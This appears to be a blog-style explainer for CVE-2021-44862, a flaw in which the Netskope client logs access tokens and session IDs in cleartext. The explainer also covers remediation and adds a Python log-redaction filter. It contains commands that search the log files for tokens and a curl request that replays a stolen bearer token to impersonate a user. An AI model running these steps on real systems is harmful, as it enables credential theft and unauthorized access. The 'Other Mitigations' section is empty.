Security vulnerabilities that seem minor can have big consequences—especially when they expose sensitive user information. CVE-2021-44862 is one such vulnerability affecting the Netskope client. This issue lets a local, authenticated attacker access private data stored in NSClient logs, mainly because sensitive information isn't hidden or removed before it's written into these logs. In this article, we’ll explain how this vulnerability works, how it can be exploited, and what you need to do to stay protected.
What is CVE-2021-44862?
CVE-2021-44862 is a local information disclosure vulnerability in the Netskope client. When certain operations are performed, the client logs sensitive information (like access tokens, user IDs, or session data) into the NSClient log files without sanitizing it. If an attacker has access to a workstation running the client, they can read these logs and steal data that should have remained private.
- Sensitive tokens and identifiers can let attackers act as if they are other users.
- Attackers can download corporate data, access restricted systems, or monitor user activities by leveraging this leaked information.
References
- Netskope Official Advisory
- NIST National Vulnerability Database – CVE-2021-44862
- Packet Storm Security Advisory
How Does the Vulnerability Work?
The vulnerability exists due to improper logging practices.
1. A user logs into the Netskope client on their machine.
2. The client performs actions that involve session tokens or other sensitive authentication information.
3. Instead of masking these sensitive fields, the client writes them directly into log files, typically stored in paths like C:\ProgramData\Netskope\NSClient\logs\.
4. Another person with access to this computer (say, another employee or a malicious local user) can browse to these logs and read sensitive data.
Here’s a sample of what a vulnerable log entry might look like:
2021-10-20 08:15:32 INFO [SessionManager] User jdoe authenticated with access token: eyJhbGciOiJIUzI1...
2021-10-20 08:15:33 DEBUG [DownloadManager] Download started for user_id: jdoe, session_id: 52hj1.y190f...
Sensitive data in cleartext:
- User IDs
Anyone who sees these log lines can copy the token, use API calls, or impersonate jdoe.
Step 1: Gaining Local Access
The attacker must have a valid account on the target machine (even a restricted local account).
The logs are usually found here:
C:\ProgramData\Netskope\NSClient\logs\
or on macOS/Linux:
/Library/Application Support/Netskope/NSClient/logs/
On Windows (using PowerShell):
Select-String -Path "C:\ProgramData\Netskope\NSClient\logs\*" -Pattern "token|session_id" | Select-Object -First 10
On Linux/macOS:
grep -E 'token|session_id' /Library/Application\ Support/Netskope/NSClient/logs/* | head -10
Suppose the attacker finds this in the log:
Authenticated with access token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
The attacker can then craft an API request:
curl -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..." \
https://acme.netskope.com/api/v1/download/user_data
Impersonating the legitimate user, the attacker gains unauthorized access to sensitive data.
Remediation
Best Fix:
Upgrade the Netskope client to the latest version. Netskope fixed the issue by making sure sensitive values are never logged.
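The general technique behind that kind of fix, as an added example (not Netskope's code and not taken from the advisory): a Python `logging` filter that masks credential-like values before a record reaches the log file. The patterns, the `[REDACTED]` mask and all function names are assumptions modelled on the sample log lines shown earlier.

```python
import io
import logging
import re

MASK = "[REDACTED]"
# Assumed patterns, modelled on the sample log lines in this article.
KEYED = re.compile(
    r"\b(access[ _]token|session_id|authorization)(\s*[:=]\s*)(?:Bearer\s+)?[^\s,;]+",
    re.IGNORECASE,
)
JWT = re.compile(r"\beyJ[A-Za-z0-9_-]{8,}[A-Za-z0-9._-]*")  # bare JWT-shaped strings

def redact(text):
    """Mask values that follow a sensitive key, then any stray JWT-like token."""
    text = KEYED.sub(lambda m: m.group(1) + m.group(2) + MASK, text)
    return JWT.sub(MASK, text)

class RedactSecrets(logging.Filter):
    """Handler-level filter: every record is scrubbed before it is formatted."""
    def filter(self, record):
        # Render %-style args first so secrets passed as parameters are covered.
        record.msg = redact(record.getMessage())
        record.args = None
        return True

# Constructed sample messages mirroring the two log lines shown earlier.
SAMPLES = [
    ("SessionManager", logging.INFO,
     "User %s authenticated with access token: %s", ("jdoe", "eyJhbGciOiJIUzI1...")),
    ("DownloadManager", logging.DEBUG,
     "Download started for user_id: %s, session_id: %s", ("jdoe", "52hj1.y190f...")),
]

def demo():
    """Send the samples through a filtered handler and return what was written."""
    buf = io.StringIO()
    handler = logging.StreamHandler(buf)
    handler.setFormatter(logging.Formatter("%(levelname)s [%(name)s] %(message)s"))
    handler.addFilter(RedactSecrets())
    for name, level, msg, args in SAMPLES:
        log = logging.getLogger(name)
        log.setLevel(logging.DEBUG)
        log.propagate = False
        log.addHandler(handler)
        log.log(level, msg, *args)
        log.removeHandler(handler)
    return buf.getvalue()

if __name__ == "__main__":
    print(demo(), end="")
```

Attaching the filter to the handler covers every logger that writes to that file. Tracebacks attached through `exc_info` are formatted separately and are not scrubbed by this filter.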
Other Mitigations:
Conclusion
CVE-2021-44862 is a clear reminder that even local vulnerabilities can be high risk, especially in environments where multiple users access the same machine. Logs should never contain unprotected sensitive information, and software vendors must sanitize logs before writing them. Upgrade your Netskope client now, review your log access policies, and stay vigilant.
If you found this helpful, make sure to check the links above for more technical details and the latest advisories.
*Stay secure, and always keep an eye on your logs!*
Timeline
Published on: 11/03/2022 20:15:00 UTC
Last modified on: 11/04/2022 13:28:00 UTC